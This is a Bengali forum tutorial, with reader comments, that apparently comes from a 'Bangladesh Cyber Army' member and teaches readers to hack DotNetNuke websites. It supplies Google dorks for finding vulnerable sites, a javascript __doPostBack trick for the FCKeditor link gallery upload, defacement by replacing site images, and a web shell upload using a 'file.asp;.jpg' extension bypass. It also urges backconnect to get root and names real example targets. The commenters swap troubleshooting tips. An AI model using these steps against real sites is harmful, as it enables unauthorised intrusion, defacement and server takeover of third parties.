DNN হল মাইক্রোসফট এর এসপি (ASP) প্রোগ্রামিং ল্যাংগুয়েজ এর একটা বাগ (Bug).এর সম্পুর্ন নামঃ Dot Net Nuke। এর মাধ্যমে আমরা ফাইল/শেল আপলোড করতে পারব।
না, যে সকল সাইট এই Vulnerable সে সকল সাইট হ্যাক করা যাবে। অনেক সাইট এ Hackable.
মামু আছে না! মামু থাকতে চিন্তা নাই। আমি কয়েকটা ডর্ক দিচ্ছি যা দিয়ে সহজেই Vulnerable সাইট বের করতে পারবেন।
inurl:/portals/0
inurl:Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
inurl:"Fck/fcklinkgallery.aspx"
এখন রেজাল্ট এর একটা সাইটএ ক্লিক করুন
আপনি এইরকম দেখতে পাবেন
আপনি এইরকম দেখতে পাবেন. অথবা
http://আপনারসাইট/HtmlEditorProviders/Fck/fcklinkgallery.aspx
এখন ৩নং অপশনটি[File(A File On Your Site)] সিলেক্ট করুন।
এখন ব্রাউজার এর এড্রেসবার এর লিখুন
javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
কোন এক কারোনে জাভাস্রিপ্টটা কাজ করছে না তারা এইখান থেকে জাভাস্রিপ্টটা ডাউনলোড করে নিন http://www.mediafire.com/?irruu15qetlebuj
এইপ্রজন্ত এসে থামুন।
এখন যে সাইট হ্যাক করবেন ওই সাইটে যান নতুন একটি ট্যাব খুলে।
মানে, আপনি ধরেন এখন http://demo4x.com সাইটটি হ্যাক করবেন। ওইখানের হোমপেজ এ যান। তারপর যেকোন একটা ইমেজ এ Right বাটন এ ক্লিক করুন।
এন্টার এ চাপ দিন। এখন নতুন একটি অপশন দেখতে পাবেন
তারপর দেখবেন “Open Image In New Tab” এই খানে ক্লিক করুন। মানে ইমেজটি নতুন একটি ট্যাব এ ওপেন করুন। এখন খেয়াল করুন ইমেজ টি কি নামে আছে। এখন আপনি Photoshop/Gimp দিয়ে একটা ইমেজ বানিয়ে ফেলুন। Hacked By BCA !! (আপনার ইচ্ছামত) ইমেজটি সেভ করবেন ওই ইমেজের নামে যে নামে ইমেজটি সাইটে আছে। ব্যাস এখন আবার আগের জায়গায় ফিরে যান। যে নতুন অপশনটি আসছিল ওইখানে গিয়ে আপলোড করুন। এখন সাইটের হোমপেজ এ গিয়ে দেখুন আগের ইমেজটি নেই, আপনার ইমেজটি আছে(!) হয়ে গেল হ্যাক
আগের মত ই STOP প্রজন্ত আসুন । এখন নতুন যে অপশনটি আসছে ওইটাতে ক্লিক করে একটা SWF/TXT/JPG/GIF/DOC/PDF ফাইল আপলোড করুন। অবশ্যই ফাইলে লেখা থাকবে Hacked By BCA.
এই ব্যাপারে SWF ফাইল হলে ই ভাল হয় অনেক সুন্দর করতে পারবেন।
SWF ফাইল বানানোর জন্য অনেক সফট পাবেন। মামুর কাছেই জিজ্ঞেস করুন। http://google.com
তারপর আপলোড করার পর এই ঠিকানায় যান
http://আপনারভিক্টিম.com/portals/0/আপনারফাইল.swf
কিছু কিছু যায়গায় portals/0 কাজ করবে না। এই সময় ওই সাইটের একটা ইমেজ নতুন ট্যাব এ ওপেন করে দেখুন কি পোর্টাল এ আছে।
শেষ, হয়ে গেল হ্যাক
আগের মতই STOP প্রজন্ত আসুন। তারপর নতুন আপশনটি তে ক্লিক করে একটা শেল আপলোড করুন। এখান থেকে ASP শেলটি ডাউনলোড করুন তারপর আপলোড করুন। কিন্তু আপনাকে সরাসরি ASP ফাইল আপলোড করতে দিবে নাL এই জন্য ট্রিকস ব্যাবহার করতে হবে। J আপনার শেল টা রিনেম করুন লিখুন maruf.asp;.jpg
এখন আপলোড করুন দেখুন আপলোড করতে দিচ্ছে। ওহ আপনাকে অবশ্যই ASP শেল ব্যাবহার করতে হবে। PHP শেল কিন্তু কাজ করবে না।
শেল আপলোড হয়ে গেলে এইখানে যান
http://ভিক্টিম.com/portals/0/maruf.asp;.jpg
“ভিক্টিম” এর জায়গায় আপনার Hackable সাইটের নাম লিখবেন।
তারপর পেয়ে যাবেন শেল একসেস। ইয়া ইয়া হুপুরা সাইট আপনার কট্রলে । তেমন ক্ষতি করবেন না। আর যারা একটু Advance তারা Backconnect দিয়ে সার্ভার Root করে ফেলুন।
আর অবশ্যই মন্তব্য করবেন। আপনাদের এই মন্ত্যবের জন্যই এত কষ্ট করে টিউন লেখা।
টিউন করার তেমন সময় পাই না তারপরও করতে বসলাম। শুধুমাত্র আপনাদের জন্য। ধন্যবাদ সবাইকে। এর পরো না পারলে এই বইটা পড়ুন বাংলা। এই টিউনেরই পিডিএফ
এই টিউনটি বাংলাদেশ সাইবার আর্মি এর অনুমতি ছাড়া অন্য কোথাও কপি পাস্ট করা যাবে না।
আমি মারুফ আলাম। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 13 বছর 9 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 16 টি টিউন ও 296 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 1 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।
uid=0(root) gid=0(root) groups=0(root)
ঠিক আছে কমেন্ট করতাছি- আপনাকে টিউন করার জন্য ধন্যবাদ। আমি এখনও পড়ে দেখিনাই 🙂 তবে কম্পুটারে সংরক্ষন কইরা রাখছি 🙂
@মারুফ আলাম: আসলে কোন এর অগ্যাত কারোনে জাভাস্রিপ্ট টা কাজ করতে না। http://www.mediafire.com/?irruu15qetlebuj এখান থেকে জাভাস্রিপ্ট টা ডাউনলোড করে নিন
ভাই জাভাস্ক্রিপ্ট টা রান করাতে পারছি না। কিভাবে রান করাবো জাভাস্ক্রিপ্ট একটু বললে ভাল হতো।
@রেজা কায়সার: http://www.mediafire.com/?irruu15qetlebuj এইটা ডাউনলোড করে লেখাটা কপি পাস্ট করুন তারপর ব্রাউজারের যেখানে ঠিকানা লিখেন ওইখানে জাভাস্রিপ্ট টা লিখে Enter দেন
ভাই,
আপনার link gallery আর আমার তো আলাদা আসে। প্লিজ এই স্ক্রীন শট’টা দেখুন। http://awesomescreenshot.com/04bk7lo36
javascript টা এড্রেসবারে লিখে কি Enter চাপবো । বুঝতে পারছিনা।
@মারুফ আলাম:
হ্যাঁ স্ক্রীনশট।আমি বলতে চেয়েছিলাম আপনার স্ক্রীনশট দেয়া ওই গুলার মত আমার ব্রাউজার এ আসে না। আমার যা আসে তা আমি স্ক্রীনশটএ দিয়েছি। আমি ক্রম ব্যবহার করি
@রেজা কায়সার: @billi: শিখার জন্য এই লিঙ্কটা দেখেন http://www.danzzara.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
ভাই বিলি ভাইয়ের মত আরও একই অবস্থা। বিস্তারিত ভাবে বললে বোঝা যেত জাভা স্ক্রিপ টা লিখে এন্টার মারবে নাকি কপি করে দিলেই হবে।
@টপ_টেক: backtrack হল একটি অপারেটিং সিস্টেম , লিনাক্স ভিত্তিক। এতে হ্যাকারদের বিভিন্ন টুল সাথেই দেওয়া থাকে।
অনেক অনেক ধন্যবাদ। এখন সবাই কিছু না কিছু হ্যাকিং করতে পারবে। হ্যাকিংয়ের মজাই আলাদা।।;)
@এ এম আরাফাত হায়দার: হ্যাকিং অনেকটা নেশার মত। যারা হ্যাকার তারা এই নেশায় পাগল হইয়া যায়
1. It only works on Older versions, as DNN have fixed the code in new release.
So try searching, there are lots of other website out there.
Also depends on the shell script that you upload, most of the asp and php works.. try testing your script locally first.
2. Apnar kache kono java script nei thakle mideafire e upload kore diten…..karon midea fire e kono file nei
3. Apni jekhan theke eai tune korechen tar link niche dilam……
http://chintan-waghmare.blogspot.com/2011/01/how-to-hack-dot-net-nuke-dnn-cms.html
@Nil Akash: এটা আমি কোনখান থেকে কপি করি নাই। আর হ্যা, ভাষা ঠিক করে কথা বলুন। মিডিয়াফায়ারে জাভাস্রিপ্ট আপলোড করাই আছে। সাইবার আর্মি সম্পর্কে আপনার ভুল ধারনা আছে। এই কমান্টা পরার জন্য স্ট্যাফদের দৃষ্টি আকর্শন করছি। আপনি বড় হ্যাকার হলে আমাদের কিছু শিখান। যারা হ্যাকিং যানে না তাদের সাথে শেয়ার করলাম। আপনার মত কু মানুষের জন্যই আমাদের দেশের এই অবস্থা
@মারুফ আলাম: কিছু কিছু আজাইরা মানুষ আছে যারা নিজেরে খুব বড় ভাবে… ওদের কথায় কান দিবেন না…
@Nil Akash: ভাই বাংলাদেশ সাইবার আর্মিতে আসেন। আপনারে সাইবার আর্মির ছোট ছোট (আদরের ডাক) হ্যাকাররা অনেক মিস করছে। কিছু শিখিয়ে দিয়ে যান। এই যে fb লিঙ্ক http://www.facebook.com/groups/bdcyberarmy/
@এ এম আরাফাত হায়দার: এদের জন্যই কিছু লিখতে মন চায় না। ধন্যবাদ ইশতিয়াক এবং আরাফাত
Nil Akash, apni kirokom hacker j Bangladesh Cyber Army chinen na. kono kisu na jene montobbo korben na. r DNN hacking j sudhu ak jon e pare ta na, apni j link ta disen sekhane j likhse se o karo kas theke sikhse .
জাভাস্ক্রিপ্ট কাজ না করলে ইন্টারনেট এক্সপ্লরার ব্রাউজার দিয়ে ছেস্তা করুন
@Prithibi: ফায়ারফক্স এর নতুন ভার্সন এ এই জাভাস্রিপ্ট কাজ করে না। ইন্টারনেট এক্সপ্লোর অথবা ক্রম ব্যাবহার করে দেখতে পারেন
(মারুফ ভাই মানে, আপনি ধরেন এখন http://demo4x.com সাইটটি হ্যাক করবেন। ওইখানের হোমপেজ এ যান। তারপর যেকোন একটা ইমেজ এ Right বাটন এ ক্লিক করুন।
এন্টার এ চাপ দিন। এখন নতুন একটি অপশন দেখতে পাবেন)
এ লিখাটা আমি বুঝি নাই, কারন ইমেজ এ রাইট বাটন ক্লিক করার পর কোন Enter এর অপশন নাই। রাইট বাটন ক্লিক করতে view image, copy image, copy image location, save image as , send image, set as desktop background , view image info আসে। এখানে কোন Enter aএর অপশন নাই। তাহলে কি করে বা কথায় enter করব?
@MD.AL MAMUN: আমি তো Enter এ ক্লিক করতে বলি নাই। নতুন একটা ট্যাব খুলে ইমেজটি ওপেন করতে বললাম। নতুন ট্যাব না খুললেও চলবে। সুবিধার জন্য ট্যাব করলে ভাল হয়
@মারুফ আলাম: @মারুফ আলাম: vai , ami to onek agei dnn ses korsi, ami explorer die kori, firefox die hoyna.
মারুফ আলম ভাই আপনি মনে হয় নিজে ট্রাই করে দেখেন নাই , কারন এ টিউনটা মনে হয় আপনি http://www.hackillusion.com থেকে How to hack a website using DotNetNuke এর অনুবাদ করে টিউন করেছেন। এ লিংকটাতে ক্লিক করেন দেখুন তো ঠিক আছে কিনা। http://www.hackillusion.com/2011/03/how-to-hack-any-website-using.html
@MD.AL MAMUN: মারুফ ভাই আপনি নাকি ট্রাই করেন নি? :0 :O :O
Nil Akash ভাইয়ের মত আপনারও একই ওষুধ। আসুন বাংলাদেশ সাইবার আর্মিতে… মারুফ আলম ভাইকে কেন আরো অনেক ভাইকে পাবেন যারা শুধু কপি পেস্ট করেই ছোট ছোট (আদরের ডাক) হ্যাকার। হা হা হা
@MD.AL MAMUN: গুগলে DNN Hacking Tutorial লিখে সার্চ দিলে অনেক টিটোরিয়াল পাবেন। আর আমি ট্রাই করি নাই! হাসালেন, পিচ্চি সময় DNN হ্যাকিং করতাম। হে হে।
Bangladesh a eto boro boro hacker ase janai silo na………..Tobe jara kisu jane tara kokhono vab niye beray na…….jeta jani sheta nijer moddhe rekhe manush ke dite hobe………tahole sheta desher upokare ashbe…….shonen nije ke eto boro mone koren na..@Nil Akash…..ar maruf kemon hacker and kemon programmer ta apnara keu e janen na……uni Bangladesh Cyber Army er Moderator……abar mone koren na je oke tar chehara dekhe oi post ta deya hoise………unar pura details age jene niyen tarpor karo shathe lagte aishen…….@Nil Akash…..mone rakhben apnar upor o aro onek boro keu ase…aita mone rakhe kisu bolben and korben…..valo thakben shobai………….and good post maruf….. 🙂
@Isti ak ahmed: ধন্যবাদ ইশতিয়াক। টিউন করলাম শিখানোর জন্য এখন উল্ট আমিও কিছু শিখলাম।
@billi: ৩নং অপশনটি সিলেক্ট করে জাভাস্কিপ্টটী রান করবেন http://www.mediafire.com/?kpccnba3grn54zq এই বইটা দেখতে পারেন
এতো সোজা হ্যাক করা? এখনি ট্রাই মারতাছি। অনেক অনেক অনেক থ্যাঙ্কস ফর শেয়ার। যদি না পারি থ্যঙ্কস ফেরত দিবেন 😀